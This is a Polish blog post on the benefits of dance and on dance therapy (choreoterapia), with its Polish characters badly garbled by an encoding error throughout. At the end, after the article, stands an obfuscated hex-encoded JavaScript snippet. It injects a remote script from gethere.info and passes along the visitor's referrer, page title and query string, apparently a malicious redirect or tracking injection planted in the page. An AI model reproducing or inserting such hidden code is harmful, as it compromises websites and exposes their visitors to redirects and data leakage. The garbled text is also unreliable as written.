Taniec, ktA?ry leczy

opublikowane w Najnowsze Wpisy, Psychologia | 0

Taniec towarzyszy czA�owiekowi od zawsze i jest sztukA� A�ciA�le zwiA�zanA� zA�A?yciem ludzkim. W czasach pierwotnych taniec byA� m.in. narzA�dziemA�komunikowania siA� ze sobA�. Poprzez ruch ludzie wyraA?ali emocje takie jak radoA�A�, zA�oA�A�, lA�kA�czy strach. Taniec byA� takA?e wykorzystywany w odprawianiu rytuaA�A?w i czarA?w. Wierzono wA�jego magiA�, wpA�yw na zdrowie, dobre samopoczucie oraz na losy ludzkoA�ci.A�W staroA?ytnoA�ciA�uznawano go za jednA� z trzech sztuk, obok poezji i muzyki, doskonalA�cA� duchaA�ludzkiego.A�LiczniA�filozofowie staroA?ytni podkreA�lali walory taA�ca. NaleA?y do nich miA�dzyA�innymi Sokrates, ktA?ry twierdziA�, A?e dziA�ki taA�cowi jego ciaA�o jest w lepszej formie, a umysA�A�bardziej swobodny. Jak siA� okazuje, taniec to nie tylko rodzaj rozrywki, ale takA?e… forma terapii. I to w dodatku bardzo skuteczna.

Jakie sA� korzyA�ci z taA�czenia? Badania pokazujA�, A?e taniec, podobnie jak kaA?da inna aktywnoA�A� ruchowa, maA�korzystny wpA�yw na zdrowie i psychikA� . Do korzyA�ci fizycznych moA?naA�zaliczyA� poprawA� struktury miA�A�niowej, zwiA�kszenie odpornoA�ci organizmu, rozwijanieA�zdolnoA�ci motorycznych takich, jak: gibkoA�A�, szybkoA�A�, skocznoA�A�, zwinnoA�A� i wytrzymaA�oA�A�.A�Taniec ksztaA�tuje prawidA�owA� postawA� oraz zapobiega powstawaniu takich wad jak skolioza,A�lordoza, kifoza. Ponadto, taniec pobudza wydzielanie gruczoA�A?w dokrewnych, szczegA?lnieA�endorfin, ktA?re wpA�ywajA� na odczuwanie radoA�ci i zadowolenia. W trakcie wysiA�ku fizycznegoA�rozA�adowywane sA� nadmierne obciA�A?enia psychoemocjonalne. Badania przeprowadzoneA�przez Duberg (2012) pokazujA�, A?e regularne uczestniczenie w lekcjach taA�ca podnosiA�poczucie wA�asnej wartoA�ci oraz pomaga zwalczaA� depresjA� i stres. WykazaA�o takA?e pozytywnA�A�rolA� taA�ca w redukcji lA�ku i agresji. TA�umaczone jest toA�faktem, iA? taniec jest jednA� z form rozA�adowywania napiA�cia, daje moA?liwoA�A� ekspresji emocji, takA?e tych negatywnych.A�WysiA�ek fizyczny stymuluje psychicznA� sferA� czA�owieka, na przykA�adA�wspomaga sprawnoA�A� intelektualnA�.A�Poprzez przebywanie w grupie ksztaA�tuje kulturA� osobistA�, zainteresowaniaA�oraz poczucie solidarnoA�ci czy zdyscyplinowania. Wyrabia poczucie piA�kna i estetyki,A�ksztaA�tuje poczucie wA�asnej wartoA�ci, pewnoA�A� siebie i samodzielnoA�A�. UmoA?liwiaA�samorealizacjA� i budowanie wA�asnej indywidualnoA�ci, aktywizuje prawA� pA?A�kulA� mA?zgowA�A�odpowiadajA�cA� miA�dzy innymi za dziaA�alnoA�A� artystycznA� i orientacjA� przestrzennA�.A�Taniec ma duA?y wpA�yw na osobowoA�A� A�wiczA�cych. Rozwija wraA?liwoA�A� emocjonalnA�,A�zdolnoA�A� ekspresji i improwizacji ruchowej.A�Badania pokazujA�, A?e taniecA�pozytywnie wpA�ywa na obraz ciaA�a i podnosi samoocenA�, a osoby taA�czA�ce sA�A�bardziej zadowolone ze swojego wyglA�du.

Choreoterapia, czyli terapia taA�cem

W zwiA�zku z dobroczynnym wpA�ywem taA�ca na psychikA� czA�owieka powstaA� nurtA�terapii opartej na taA�cu zwany choreoterapiA�. DziA�ki tej metodzie, podobnie jak innym technikom arteterapii, moA?na eliminowaA� lA�ki oraz rozA�adowywaA�A�napiA�cia emocjonalne. Choreoterapia wywodzi siA� z nurtu taA�caA�wspA?A�czesnego i oparta jest na aktywnej pracy z ciaA�em poprzez ruch do rA?A?norodnej muzyki.A�NawiA�zuje do taA�cA?w plemiennych, gdzie taniec stanowiA� naturalny sposA?b przekazywaniaA�emocji. W choreoterapii nie ma znaczenia technika taA�ca, nie polega teA? ona na opanowaniuA�krokA?w. Jest ona rodzajem taA�ca twA?rczego, spontanicznego, opartego na zaA�oA?eniu, A?e ciaA�o iA�umysA� sA� nierozA�A�czne. Do celA?w terapii moA?na zaliczyA� miA�dzy innymi: korektA� zaburzeA�A�psychomotorycznych, poprawA� kontaktA?w spoA�ecznych, przywrA?cenie jednoA�ci ciaA�a, umysA�uA�i duszy. Terapia ma takA?e poprawiA� integracjA� miA�dzy ciaA�em a umysA�em,A�wzmocniA� pewnoA�A� siebie, moA?e teA? pomA?c ujawniA� zablokowane czy powstrzymywaneA�wspomnienia, ktA?rych uA�wiadomienie przynosi ulgA� lub caA�kowicie eliminuje napiA�cia i stres.A�W terapii taA�cem stosuje siA� takie formy jak: taniec, A�wiczenia muzyczno-ruchowe,A�improwizacje, zabawy ruchowe, pracA� z ciaA�em, trening odczuwania czy relaksacja. TaniecA�obejmuje polskie taA�ce narodowe i regionalne, taA�ce innych kultur oraz taA�ce towarzyskie wA�prostych ukA�adach. A�wiczenia muzyczno-ruchowe obejmujA� A�wiczeniaA�oddechowe, rozluA?niajA�ce, wymagajA�ce wspA?A�dziaA�ania oraz skoncentrowane na poprawieA�koordynacji. Celem zabaw ruchowych jest poprawienie nastroju, respektowanie zasad, a takA?eA�uA�atwienie kontaktu z innymi osobami. Improwizacje ruchowe rozwijajA� wyobraA?niA� iA�kreatywnoA�A�, pozwalajA� na spontaniczny taniec i tworzenie wA�asnych ukA�adA?w tanecznych.A�Wiele badaA� potwierdza skutecznoA�A� choreoterapii w zakresie obniA?enia poziomu lA�kuA�i poziomu neurotycznoA�ci, poprawy koncentracji uwagi oraz koordynacji ruchowej, obniA?eniaA�napiA�cia psychofizycznego, rozA�adowania agresji, zwiA�kszenia odpornoA�ci na zmA�czenie,A�podniesienia samooceny oraz korzystnych zmian zachowania.

Choreoterapia moA?e byA� wykorzystywana takA?e w ramach profilaktyki i osobistegoA�rozwoju czA�owieka. Stosowana jest wobec osA?b z zaburzeniamiA�psychicznymi takimi jak np. upoA�ledzenie umysA�owe, depresja, schizofrenia, nerwice orazA�wobec osA?b niewidomych, gA�uchych, autystycznych, z zespoA�em Downa, poraA?eniemA�mA?zgowym, nadpobudliwoA�ciA� ruchowA� oraz zaburzeniami odA?ywiania. Badania dowodzA�, A?eA�dzieci z zespoA�em Downa uczA�szczajA�ce na terapiA� taA�cem doA�wiadczaA�y poprawy wA�rA?wnowadze, motoryce i napiA�ciu miA�A�ni.A�Terapia taA�cem wpA�ywa na poprawA� samopoczucia, zmniejszenie uczucia niepokoju, przynosiA�korzyA�ci fizyczne i spoA�eczne, tak wiA�c moA?e z niej skorzystaA� kaA?dy z nas, nie tylko osoby chore.

7807adfef723cca4_shutterstock_154062314.xxxlarge_2x


 

 var _0xb322=[„\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}